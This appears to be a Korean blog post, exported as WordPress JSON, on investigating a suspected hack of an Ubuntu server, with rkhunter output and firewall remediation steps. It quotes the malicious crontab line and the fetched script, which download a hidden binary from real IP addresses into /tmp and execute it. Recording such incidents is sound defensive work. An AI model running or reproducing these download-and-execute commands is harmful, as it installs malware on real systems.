{"id":683,"date":"2019-06-10T09:32:55","date_gmt":"2019-06-10T00:32:55","guid":{"rendered":"https:\/\/www.kkoc.org\/?p=683"},"modified":"2019-07-06T14:37:39","modified_gmt":"2019-07-06T05:37:39","slug":"%ed%95%b4%ed%82%b9-%ec%9d%98%ec%8b%ac","status":"publish","type":"post","link":"https:\/\/www.kkoc.org\/?p=683","title":{"rendered":"\ud574\ud0b9 \uc758\uc2ec"},"content":{"rendered":"\n<p>\uc5b8\uc81c \ubd80\ud130\uc778\uac00 ubuntu \uc11c\ubc84\uc5d0 CPU\uac00 100%\uc774\uc0c1 \uc0ac\uc6a9\ud558\ub294 \ud504\ub85c\uc138\uc2a4\uac00 \ubcf4\uc774\uace0 \ud574\ud0b9\uc774 \uc758\uc2ec\ub418\ub294 \ud604\uc0c1\uc774 \ubc1c\uc0dd\ud588\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n<p>crontab\uc5d0 \ub0b4\uac00 \ub4f1\ub85d\ud55c job\uc774 \uc5c6\uc5b4 \uc9c0\uace0 \uc544\ub798\uc758 \ud56d\ubaa9\uc774 \ucd94\uac00\ub41c\uac83\uc744 \ud655\uc778\ud558\uace0 \ucc98\uc74c\uc5d0\ub294 \ubcf4\uc548\ud328\uce58\ub97c \ud574\uc11c \uc790\ub3d9\uc73c\ub85c \ub4f1\ub85d\ub418\ub294 job\uc778\uc904 \uc54c\uace0 \ub300\uc18c\ub86d\uac8c \uc5ec\uae30\uc9c0 \uc54a\uace0 \uadf8\ub0e5 \ub118\uc5b4 \uac14\ub294\ub370&#8230; \uc5b4\ub290 \uc21c\uac04\uc778\uac00 \ub3d9\uc77c\ud55c \ub0b4\uc6a9\uc774 \ub4f1\ub85d\ub418\uc5b4 \uc788\ub294\uac83\uc744 \ubcf4\uace0 \ub09c\uac10\ud588\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n<p>crontab -l \uba85\ub839\uc73c\ub85c \uc870\ud68c\ub97c \ud574\ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\">ubuntu:~$ crontab -l\n*\/23 * * * * (curl -k -fsSL https:\/\/termbin.com\/mfzn || wget --no-check-certificate -q -O- https:\/\/termbin.com\/mfzn)|sh<\/pre>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>https:\/\/termbin.com\/mfzn \uc0ac\uc774\ud2b8\uc5d0 \uc811\uc18d\ud574\uba74&#8230;<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" 
data-enlighter-group=\"\">((curl -fsSL --connect-timeout 10 http:\/\/186.226.176.254\/dovecot -o \/tmp\/.dovecot || wget --timeout=10 -q http:\/\/186.226.176.254\/dovecot -O \/tmp\/.dovecot)||curl -fsSL --connect-timeout 10 http:\/\/185.84.91.154:443\/dovecot -o \/tmp\/.dovecot||wget --timeout=10 -q http:\/\/185.84.91.154:443\/dovecot -O \/tmp\/.dovecot) &amp;&amp; chmod +x \/tmp\/.dovecot\n\/tmp\/.dovecot<\/pre>\n\n\n\n<p>dovecot \ud30c\uc77c\uc740 linux-vdso.so, libc.so \ub4f1 \ub77c\uc774\ube0c\ub7ec\ub9ac\ub97c \ucc38\uc870\ud558\ub294 \ub188\uc785\ub2c8\ub2e4. crontab 의 *\/23 설정에 따라 23분 간격(매시 0, 23, 46분)으로 \/tmp\/.dovecot 을 내려받아 실행권한을 주고 실행까지 하도록 스크립트를 설정해 놓고 있었습니다.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> ubuntu:~$  ldd dovecot     \n         linux-vdso.so.1 =>  (0x00007ffe927c5000)\n         libc.so.6 => \/lib64\/libc.so.6 (0x00007fc8c1900000)\n         \/lib64\/ld-linux-x86-64.so.2 (0x00007fc8c1ccd000)<\/code><\/pre>\n\n\n\n<p>참고: 출처를 알 수 없는 바이너리에 ldd 를 직접 실행하면 그 파일의 코드가 실행될 수 있으므로, 격리된 환경에서 readelf -d 나 objdump -p 로 의존 라이브러리를 확인하는 편이 안전합니다.<\/p>\n\n\n\n<p>\ub204\uac00 \uc5b4\ub5a4 \uacbd\ub85c\ub85c \uc5b4\ub5bb\uac8c \uc124\uce58 \ud588\ub294\uc9c0 \ucc3e\uc744 \uc218 \uc788\uc744\uc9c0 \ubaa8\ub974\uaca0\ub2e4&#8230;<\/p>\n<p>\uc815\uc2e0\uc744 \ucc28\ub9ac\uace0 tmp \ud3f4\ub354 \ubd80\ud130 \ub2e4\uc2dc \ucc3e\uc544 \ubcf8\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">root@ubuntu:\/tmp# ls -al\n\ud569\uacc4 104\ndrwxrwxrwt 24 root  root  4096  6\uc6d4 11 09:36 .\ndrwxr-xr-x 24 root  root  4096  6\uc6d4  5 22:53 ..\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .ICE-unix\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .Test-unix\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .X11-unix\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 
22:58 .XIM-unix\n-rwxr-x---  1 chohi chohi 6752  5\uc6d4 30 03:32 .dovecot\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .font-unix\ndrwxr-x---  2 chohi chohi 4096  6\uc6d4 10 09:43 hsperfdata_chohi\ndrwxrwxr-x  2 chohi chohi 4096  6\uc6d4  5 23:08 jna-94636843\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 23:05 ssh-3doo9adyu6\ndrwx------  2 chohi chohi 4096  6\uc6d4  6 05:50 ssh-6J2YGqCSwx\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 23:46 ssh-9g4AChhpsN\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 22:59 ssh-TgPJ00EnoH\ndrwx------  2 chohi chohi 4096  6\uc6d4  8 15:54 ssh-aIcaUjsQCw\ndrwx------  2 chohi chohi 4096  6\uc6d4  6 00:07 ssh-lAdtd5e1rP\ndrwx------  2 chohi chohi 4096  6\uc6d4  6 00:47 ssh-n3ek5TdGX5\ndrwx------  2 chohi chohi 4096  6\uc6d4 11 08:36 ssh-sXzTLmvSwT\ndrwx------  2 chohi chohi 4096  6\uc6d4 11 09:18 ssh-svffT93zdp\ndrwx------  2 chohi chohi 4096  6\uc6d4  8 16:08 ssh-wg9C63dF0Z\ndrwx------  2 chohi chohi 4096  6\uc6d4  8 15:57 ssh-ymPNhE1UBh\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 23:26 ssh-zYYK0JxBYP\ndrwx------  3 root  root  4096  6\uc6d4  5 22:58 systemd-private-505c245ad90b489d94c81a140a27e391-systemd-resolved.service-Zgg598\ndrwx------  3 root  root  4096  6\uc6d4  5 22:58 systemd-private-505c245ad90b489d94c81a140a27e391-systemd-timesyncd.service-a47ed2\ndrwx------  2 root  root  4096  6\uc6d4  5 22:58 vmware-root_670-2722828838<\/pre>\n\n\n\n<p>5\uc6d4 30\uc77c 03\uc2dc 32\ubd84 .dovecot \ud30c\uc77c\uc774 \uc0dd\uacbc\ub2e4. 
\uc774\uc2dc\uac04\ub300 \ub85c\uadf8\ub97c \ubd10\uc57c \ud558\ub294\ub370, \uc2dc\uac04\uc774 \ub9ce\uc774 \uc9c0\ub098\uc11c \ud655\uc778\uc740 \ubabb\ud588\ub2e4.<\/p>\n\n\n\n<p>루트킷, 백도어 및 가능한 로컬 익스플로잇을 검색하는 Unix 기반 도구인 rkhunter (Rootkit Hunter)를 설치하여 점검해 봤습니다. 아래에서는 배포 파일을 http 로 내려받았으므로, 배포처가 체크섬이나 서명을 제공한다면 설치 전에 무결성을 확인하는 것이 좋습니다.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># rkhunter \ub2e4\uc6b4\ub85c\ub4dc \n[root@www ]# wget http:\/\/downloads.sourceforge.net\/rkhunter\/rkhunter-1.4.6.tar.gz \n\n# \uc555\ucd95\ud480\uc5b4 \uc8fc\uace0 \uc124\uce58\ub97c \uc9c4\ud589\ud569\ub2c8\ub2e4.\nroot@ubuntu:~\/temp\/rkhunter-1.4.6# .\/installer.sh --install\nChecking system for:\n Rootkit Hunter installer files: found\n A web file download command: wget found\nStarting installation:\n Checking installation directory \"\/usr\/local\": it exists and is writable.\n Checking installation directories:\n  Directory \/usr\/local\/share\/doc\/rkhunter-1.4.6: creating: OK\n  Directory \/usr\/local\/share\/man\/man8: creating: OK\n  Directory \/etc: exists and is writable.\n  Directory \/usr\/local\/bin: exists and is writable.\n  Directory \/usr\/local\/lib: exists and is writable.\n  Directory \/var\/lib: exists and is writable.\n  Directory \/usr\/local\/lib\/rkhunter\/scripts: creating: OK\n  Directory \/var\/lib\/rkhunter\/db: creating: OK\n  Directory \/var\/lib\/rkhunter\/tmp: creating: OK\n  Directory \/var\/lib\/rkhunter\/db\/i18n: creating: OK\n  Directory \/var\/lib\/rkhunter\/db\/signatures: creating: OK\n Installing check_modules.pl: OK\n Installing filehashsha.pl: OK\n Installing stat.pl: OK\n Installing readlink.sh: OK\n Installing backdoorports.dat: OK\n Installing mirrors.dat: OK\n Installing programs_bad.dat: OK\n Installing suspscan.dat: OK\n Installing rkhunter.8: OK\n Installing ACKNOWLEDGMENTS: OK\n Installing CHANGELOG: OK\n 
Installing FAQ: OK\n Installing LICENSE: OK\n Installing README: OK\n Installing language support files: OK\n Installing ClamAV signatures: OK\n Installing rkhunter: OK\n Installing rkhunter.conf: OK\nInstallation complete\n\n# rkhunter \uc2e4\ud589.\nroot@ubuntu:~\/temp\/rkhunter-1.4.6# rkhunter -c\n[ Rootkit Hunter version 1.4.6 ]\n\nChecking system commands...\n\n  Performing 'strings' command checks\n    Checking 'strings' command                               [ Skipped ]\n\n  Performing 'shared libraries' checks\n    Checking for preloading variables                        [ None found ]\n    Checking for preloaded libraries                         [ None found ]\n    Checking LD_LIBRARY_PATH variable                        [ Not found ]\n\n  Performing file properties checks\n    Checking for prerequisites                               [ Warning ]\n    \/usr\/local\/bin\/rkhunter                                  [ OK ]\n    \/usr\/sbin\/adduser                                        [ Warning ]\n    \/usr\/sbin\/chroot                                         [ OK ]\n    \/usr\/sbin\/cron                                           [ OK ]\n    \/usr\/sbin\/groupadd                                       [ OK ]\n    \/usr\/sbin\/groupdel                                       [ OK ]\n    \/usr\/sbin\/groupmod                                       [ OK ]\n    \/usr\/sbin\/grpck                                          [ OK ]\n    \/usr\/sbin\/nologin                                        [ OK ]\n    \/usr\/sbin\/pwck                                           [ OK ]\n    \/usr\/sbin\/rsyslogd                                       [ OK ]\n    \/usr\/sbin\/sshd                                           [ OK ]\n    \/usr\/sbin\/useradd                                        [ OK ]\n    \/usr\/sbin\/userdel                                        [ OK ]\n    \/usr\/sbin\/usermod                                        [ OK ]\n    \/usr\/sbin\/vipw                          
                 [ OK ]\n    \/usr\/bin\/awk                                             [ OK ]\n    \/usr\/bin\/basename                                        [ OK ]\n    \/usr\/bin\/chattr                                          [ OK ]\n    \/usr\/bin\/cut                                             [ OK ]\n    \/usr\/bin\/diff                                            [ OK ]\n    \/usr\/bin\/dirname                                         [ OK ]\n    \/usr\/bin\/dpkg                                            [ OK ]\n    \/usr\/bin\/dpkg-query                                      [ OK ]\n    \/usr\/bin\/du                                              [ OK ]\n    \/usr\/bin\/env                                             [ OK ]\n    \/usr\/bin\/file                                            [ OK ]\n    \/usr\/bin\/find                                            [ OK ]\n    \/usr\/bin\/groups                                          [ OK ]\n    \/usr\/bin\/head                                            [ OK ]\n    \/usr\/bin\/id                                              [ OK ]\n    \/usr\/bin\/ipcs                                            [ OK ]\n    \/usr\/bin\/killall                                         [ OK ]\n    \/usr\/bin\/last                                            [ OK ]\n    \/usr\/bin\/lastlog                                         [ OK ]\n    \/usr\/bin\/ldd                                             [ Warning ]\n    \/usr\/bin\/less                                            [ OK ]\n    \/usr\/bin\/locate                                          [ OK ]\n    \/usr\/bin\/logger                                          [ OK ]\n    \/usr\/bin\/lsattr                                          [ OK ]\n    \/usr\/bin\/lsof                                            [ OK ]\n    \/usr\/bin\/md5sum                                          [ OK ]\n    \/usr\/bin\/mlocate                                         [ OK ]\n    \/usr\/bin\/newgrp    
                                      [ OK ]\n    \/usr\/bin\/passwd                                          [ OK ]\n    \/usr\/bin\/perl                                            [ OK ]\n    \/usr\/bin\/pgrep                                           [ OK ]\n    \/usr\/bin\/pkill                                           [ OK ]\n    \/usr\/bin\/pstree                                          [ OK ]\n    \/usr\/bin\/rpm                                             [ OK ]\n    \/usr\/bin\/runcon                                          [ OK ]\n    \/usr\/bin\/sha1sum                                         [ OK ]\n    \/usr\/bin\/sha224sum                                       [ OK ]\n    \/usr\/bin\/sha256sum                                       [ OK ]\n    \/usr\/bin\/sha384sum                                       [ OK ]\n    \/usr\/bin\/sha512sum                                       [ OK ]\n    \/usr\/bin\/sort                                            [ OK ]\n    \/usr\/bin\/ssh                                             [ OK ]\n    \/usr\/bin\/stat                                            [ OK ]\n    \/usr\/bin\/strace                                          [ OK ]\n    \/usr\/bin\/sudo                                            [ OK ]\n    \/usr\/bin\/tail                                            [ OK ]\n    \/usr\/bin\/telnet                                          [ OK ]\n    \/usr\/bin\/test                                            [ OK ]\n    \/usr\/bin\/top                                             [ OK ]\n    \/usr\/bin\/touch                                           [ OK ]\n    \/usr\/bin\/tr                                              [ OK ]\n    \/usr\/bin\/uniq                                            [ OK ]\n    \/usr\/bin\/users                                           [ OK ]\n    \/usr\/bin\/vmstat                                          [ OK ]\n    \/usr\/bin\/w                                               [ OK ]\n    
\/usr\/bin\/watch                                           [ OK ]\n    \/usr\/bin\/wc                                              [ OK ]\n    \/usr\/bin\/wget                                            [ OK ]\n    \/usr\/bin\/whatis                                          [ OK ]\n    \/usr\/bin\/whereis                                         [ OK ]\n    \/usr\/bin\/which                                           [ OK ]\n    \/usr\/bin\/who                                             [ OK ]\n    \/usr\/bin\/whoami                                          [ OK ]\n    \/usr\/bin\/numfmt                                          [ OK ]\n    \/usr\/bin\/gawk                                            [ OK ]\n    \/usr\/bin\/telnet.netkit                                   [ OK ]\n    \/usr\/bin\/w.procps                                        [ OK ]\n    \/sbin\/depmod                                             [ OK ]\n    \/sbin\/fsck                                               [ OK ]\n    \/sbin\/ifconfig                                           [ OK ]\n    \/sbin\/ifdown                                             [ OK ]\n    \/sbin\/ifup                                               [ OK ]\n    \/sbin\/init                                               [ OK ]\n    \/sbin\/insmod                                             [ OK ]\n    \/sbin\/ip                                                 [ OK ]\n    \/sbin\/lsmod                                              [ OK ]\n    \/sbin\/modinfo                                            [ OK ]\n    \/sbin\/modprobe                                           [ OK ]\n    \/sbin\/rmmod                                              [ OK ]\n    \/sbin\/route                                              [ OK ]\n    \/sbin\/runlevel                                           [ OK ]\n    \/sbin\/sulogin                                            [ OK ]\n    \/sbin\/sysctl                                             [ OK ]\n    
\/bin\/bash                                                [ OK ]\n    \/bin\/cat                                                 [ OK ]\n    \/bin\/chmod                                               [ OK ]\n    \/bin\/chown                                               [ OK ]\n    \/bin\/cp                                                  [ OK ]\n    \/bin\/date                                                [ OK ]\n    \/bin\/df                                                  [ OK ]\n    \/bin\/dmesg                                               [ OK ]\n    \/bin\/echo                                                [ OK ]\n    \/bin\/ed                                                  [ OK ]\n    \/bin\/egrep                                               [ Warning ]\n    \/bin\/fgrep                                               [ Warning ]\n    \/bin\/fuser                                               [ OK ]\n    \/bin\/grep                                                [ OK ]\n    \/bin\/ip                                                  [ OK ]\n    \/bin\/kill                                                [ OK ]\n    \/bin\/less                                                [ OK ]\n    \/bin\/login                                               [ OK ]\n    \/bin\/ls                                                  [ OK ]\n    \/bin\/lsmod                                               [ OK ]\n    \/bin\/mktemp                                              [ OK ]\n    \/bin\/more                                                [ OK ]\n    \/bin\/mount                                               [ OK ]\n    \/bin\/mv                                                  [ OK ]\n    \/bin\/netstat                                             [ OK ]\n    \/bin\/ping                                                [ OK ]\n    \/bin\/ps                                                  [ OK ]\n    \/bin\/pwd                                                 [ OK ]\n    
\/bin\/readlink                                            [ OK ]\n    \/bin\/sed                                                 [ OK ]\n    \/bin\/sh                                                  [ OK ]\n    \/bin\/su                                                  [ OK ]\n    \/bin\/touch                                               [ OK ]\n    \/bin\/uname                                               [ OK ]\n    \/bin\/which                                               [ Warning ]\n    \/bin\/kmod                                                [ OK ]\n    \/bin\/systemd                                             [ OK ]\n    \/bin\/systemctl                                           [ OK ]\n    \/bin\/dash                                                [ OK ]\n    \/lib\/systemd\/systemd                                     [ OK ]\n    \/etc\/rkhunter.conf                                       [ OK ]\n\n[Press &lt;ENTER> to continue]\n\n\nChecking for rootkits...\n\n  Performing check of known rootkit files and directories\n    55808 Trojan - Variant A                                 [ Not found ]\n    ADM Worm                                                 [ Not found ]\n    AjaKit Rootkit                                           [ Not found ]\n    Adore Rootkit                                            [ Not found ]\n    aPa Kit                                                  [ Not found ]\n    Apache Worm                                              [ Not found ]\n    Ambient (ark) Rootkit                                    [ Not found ]\n    Balaur Rootkit                                           [ Not found ]\n    BeastKit Rootkit                                         [ Not found ]\n    beX2 Rootkit                                             [ Not found ]\n    BOBKit Rootkit                                           [ Not found ]\n    cb Rootkit                                               [ Not found ]\n    CiNIK Worm (Slapper.B variant)    
                       [ Not found ]\n    Danny-Boy's Abuse Kit                                    [ Not found ]\n    Devil RootKit                                            [ Not found ]\n    Diamorphine LKM                                          [ Not found ]\n    Dica-Kit Rootkit                                         [ Not found ]\n    Dreams Rootkit                                           [ Not found ]\n    Duarawkz Rootkit                                         [ Not found ]\n    Ebury backdoor                                           [ Not found ]\n    Enye LKM                                                 [ Not found ]\n    Flea Linux Rootkit                                       [ Not found ]\n    Fu Rootkit                                               [ Not found ]\n    Fuck`it Rootkit                                          [ Not found ]\n    GasKit Rootkit                                           [ Not found ]\n    Heroin LKM                                               [ Not found ]\n    HjC Kit                                                  [ Not found ]\n    ignoKit Rootkit                                          [ Not found ]\n    IntoXonia-NG Rootkit                                     [ Not found ]\n    Irix Rootkit                                             [ Not found ]\n    Jynx Rootkit                                             [ Not found ]\n    Jynx2 Rootkit                                            [ Not found ]\n    KBeast Rootkit                                           [ Not found ]\n    Kitko Rootkit                                            [ Not found ]\n    Knark Rootkit                                            [ Not found ]\n    ld-linuxv.so Rootkit                                     [ Not found ]\n    Li0n Worm                                                [ Not found ]\n    Lockit \/ LJK2 Rootkit                                    [ Not found ]\n    Mokes backdoor                                           
[ Not found ]\n    Mood-NT Rootkit                                          [ Not found ]\n    MRK Rootkit                                              [ Not found ]\n    Ni0 Rootkit                                              [ Not found ]\n    Ohhara Rootkit                                           [ Not found ]\n    Optic Kit (Tux) Worm                                     [ Not found ]\n    Oz Rootkit                                               [ Not found ]\n    Phalanx Rootkit                                          [ Not found ]\n    Phalanx2 Rootkit                                         [ Not found ]\n    Phalanx2 Rootkit (extended tests)                        [ Not found ]\n    Portacelo Rootkit                                        [ Not found ]\n    R3dstorm Toolkit                                         [ Not found ]\n    RH-Sharpe's Rootkit                                      [ Not found ]\n    RSHA's Rootkit                                           [ Not found ]\n    Scalper Worm                                             [ Not found ]\n    Sebek LKM                                                [ Not found ]\n    Shutdown Rootkit                                         [ Not found ]\n    SHV4 Rootkit                                             [ Not found ]\n    SHV5 Rootkit                                             [ Not found ]\n    Sin Rootkit                                              [ Not found ]\n    Slapper Worm                                             [ Not found ]\n    Sneakin Rootkit                                          [ Not found ]\n    'Spanish' Rootkit                                        [ Not found ]\n    Suckit Rootkit                                           [ Not found ]\n    Superkit Rootkit                                         [ Not found ]\n    TBD (Telnet BackDoor)                                    [ Not found ]\n    TeLeKiT Rootkit                                          [ Not found ]\n    T0rn 
Rootkit                                             [ Not found ]\n    trNkit Rootkit                                           [ Not found ]\n    Trojanit Kit                                             [ Not found ]\n    Tuxtendo Rootkit                                         [ Not found ]\n    URK Rootkit                                              [ Not found ]\n    Vampire Rootkit                                          [ Not found ]\n    VcKit Rootkit                                            [ Not found ]\n    Volc Rootkit                                             [ Not found ]\n    Xzibit Rootkit                                           [ Not found ]\n    zaRwT.KiT Rootkit                                        [ Not found ]\n    ZK Rootkit                                               [ Not found ]\n\n[Press &lt;ENTER> to continue]\n\n\n  Performing additional rootkit checks\n    Suckit Rootkit additional checks                         [ OK ]\n    Checking for possible rootkit files and directories      [ None found ]\n    Checking for possible rootkit strings                    [ Skipped ]\n\n  Performing malware checks\n    Checking running processes for suspicious files          [ None found ]\n    Checking for login backdoors                             [ None found ]\n    Checking for sniffer log files                           [ None found ]\n    Checking for suspicious directories                      [ None found ]\n    Checking for suspicious (large) shared memory segments   [ None found ]\n\n  Performing Linux specific checks\n    Checking loaded kernel modules                           [ OK ]\n    Checking kernel module names                             [ OK ]\n\n[Press &lt;ENTER> to continue]\n\n\nChecking the network...\n\n  Performing checks on the network ports\n    Checking for backdoor ports                              [ None found ]\n\n  Performing checks on the network interfaces\n    Checking for promiscuous interfaces           
           [ None found ]\n\nChecking the local host...\n\n  Performing system boot checks\n    Checking for local host name                             [ Found ]\n    Checking for system startup files                        [ Found ]\n    Checking system startup files for malware                [ None found ]\n\n  Performing group and account checks\n    Checking for passwd file                                 [ Found ]\n    Checking for root equivalent (UID 0) accounts            [ None found ]\n    Checking for passwordless accounts                       [ None found ]\n    Checking for passwd file changes                         [ None found ]\n    Checking for group file changes                          [ None found ]\n    Checking root account shell history files                [ OK ]\n\n  Performing system configuration file checks\n    Checking for an SSH configuration file                   [ Found ]\n    Checking if SSH root access is allowed                   [ Warning ]\n    Checking if SSH protocol v1 is allowed                   [ Warning ]\n    Checking for other suspicious configuration settings     [ None found ]\n    Checking for a running system logging daemon             [ Found ]\n    Checking for a system logging configuration file         [ Found ]\n    Checking if syslog remote logging is allowed             [ Not allowed ]\n\n  Performing filesystem checks\n    Checking \/dev for suspicious file types                  [ None found ]\n    Checking for hidden files and directories                [ Warning ]\n\n[Press &lt;ENTER> to continue]\n\n\n\nSystem checks summary\n=====================\n\nFile properties checks...\n    Required commands check failed\n    Files checked: 140\n    Suspect files: 5\n\nRootkit checks...\n    Rootkits checked : 380\n    Possible rootkits: 0\n\nApplications checks...\n    All checks skipped\n\nThe system checks took: 2 minutes and 22 seconds\n\nAll results have been written to the log file: 
\/var\/log\/rkhunter.log\n\nOne or more warnings have been found while checking the system.\nPlease check the log file (\/var\/log\/rkhunter.log)<\/code><\/pre>\n\n\n\n<p>\uc2dc\uc2a4\ud15c \uc810\uac80 \uacb0\uacfc \ub2e4\ud589\ud788 \uac80\ucd9c\ub418\uc9c0 \uc54a\uc558\uc2b5\ub2c8\ub2e4. 다만 이는 알려진 루트킷이 발견되지 않았다는 뜻일 뿐이며(Possible rootkits: 0), 요약에는 Suspect files: 5 와 여러 Warning 이 남아 있으므로 \/var\/log\/rkhunter.log 를 확인해야 합니다. 이미 침해된 서버에서 실행한 점검 결과만으로 시스템이 안전하다고 단정할 수는 없습니다.<\/p>\n<p>&nbsp;<\/p>\n\n\n\n<h2>\uc870\uce58\ub0b4\uc6a9<\/h2>\n\n\n\n<h4>1. crontab \ub4f1\ub85d \uad8c\ud55c \uc870\uc815<\/h4>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># \/etc\/cron.deny \ud30c\uc77c\uc5d0 \uac70\ubd80 \uacc4\uc815 \ub4f1\ub85d\nchohi<\/pre>\n\n\n\n<h4>2. curl \uc0ad\uc81c \ucc98\ub9ac<\/h4>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># sudo apt-get remove curl<\/pre>\n\n\n\n<p>crontab 에 등록된 명령은 curl 이 실패하면 wget 으로 내려받도록 되어 있으므로, curl 삭제만으로는 다운로드를 막지 못합니다. 아래 6번의 outgoing 차단을 함께 적용해야 효과가 있습니다.<\/p>\n\n\n\n<h4>3. ssh \ud3ec\ud2b8 22-&gt; 5\uc790\ub9ac\ub85c \ubcc0\uacbd<\/h4>\n\n\n\n<h4>4. \ubc29\ud654\ubcbd SSH, \uc6f9\uc11c\ube44\uc2a4 \ub0b4\ubd80 \ud3ec\ud2b8\ub9cc accept \ub098\uba38\uc9c0\ub294 drop <\/h4>\n\n\n\n<h4>5. \uc811\uadfc \uac70\ubd80 IP \ubc29\ud654\ubcbd \ucd94\uac00<\/h4>\n\n\n\n<p># sudo ufw deny from 52.44.244.0\/24  <\/p>\n\n\n\n<p> Anywhere                   DENY IN     52.44.244.0\/24            <br> Anywhere                   DENY IN     185.84.91.0\/24            <br> Anywhere                   DENY IN     186.226.176.0\/24          <br> Anywhere                   DENY IN     5.39.93.0\/24  <\/p>\n\n\n\n<h4>6. 
outgoing \uae30\ubcf8\uc815\ucc45 deny\ub85c \uc124\uc815<\/h4>\n\n\n\n<p><\/p>\n\n\n\n<p>sudo ufw default deny outgoing  #\ub098\uac00\ub294 \ud328\ud0b7 deny<\/p>\n\n\n\n<p>sudo ufw allow out to \ud2b9\uc815IP  port 443 proto tcp  #\ub098\uac00\ub294 \ud328\ud0b7 \ud2b9\uc815IP 443\ub9cc \ud5c8\uc6a9<\/p>\n\n\n\n<p>sudo ufw status verbose #\ubc29\ud654\ubcbd \uc124\uc815\ud655\uc778<\/p>\n\n\n\n<hr>\n<pre class=\"wp-block-preformatted\">&nbsp;<\/pre>\n\n\n\n<h2>\ub85c\uadf8 \uc810\uac80<\/h2>\n\n\n\n<p>아래는 점검 대상 경로 목록입니다. Ubuntu 에서는 인증 기록이 \/var\/log\/auth.log 에, 시스템 메시지가 \/var\/log\/syslog 에 남으므로 이 두 파일도 함께 확인해야 합니다.<\/p>\n\n\n\n<p>\/var\/log\/message<\/p>\n\n\n\n<p>\/var\/log\/secure<\/p>\n\n\n\n<p>\/var\/log\/dmesg<\/p>\n\n\n\n<p>\/var\/log\/lastlog<\/p>\n\n\n\n<p>\/var\/spool\/cron<\/p>\n\n\n\n<p>\/var\/log\/utmp<\/p>\n\n\n\n<p>\/var\/log\/wtmp<\/p>\n\n\n\n<p>\/var\/log\/btmp<\/p>\n\n\n\n<p>\/var\/log\/vtmp<\/p>\n\n\n\n<p>&nbsp; <\/p>\n\n\n\n<h2>\ubc14\uc774\ub7ec\uc2a4 \uac80\uc0ac( <a href=\"https:\/\/www.virustotal.com\/\">https:\/\/www.virustotal.com<\/a> )<\/h2>\n\n\n\n<p> dovecot\ud30c\uc77c\uc744 \uc62c\ub824\uc11c \uac80\uc0ac\ub97c \ud574\uc90d\ub2c8\ub2e4.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-712\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-876x1024.png\" alt=\"\" width=\"876\" height=\"1024\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-876x1024.png 876w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-257x300.png 257w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-768x898.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00.png 1920w\" sizes=\"(max-width: 876px) 100vw, 876px\" \/><br \/><br \/><img loading=\"lazy\" class=\"alignnone size-large wp-image-713\" 
src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-1024x801.png\" alt=\"\" width=\"1024\" height=\"801\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-1024x801.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-300x235.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-768x601.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35.png 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><img loading=\"lazy\" class=\"alignnone size-large wp-image-714\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-1024x578.png\" alt=\"\" width=\"1024\" height=\"578\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-1024x578.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-300x169.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-768x433.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52.png 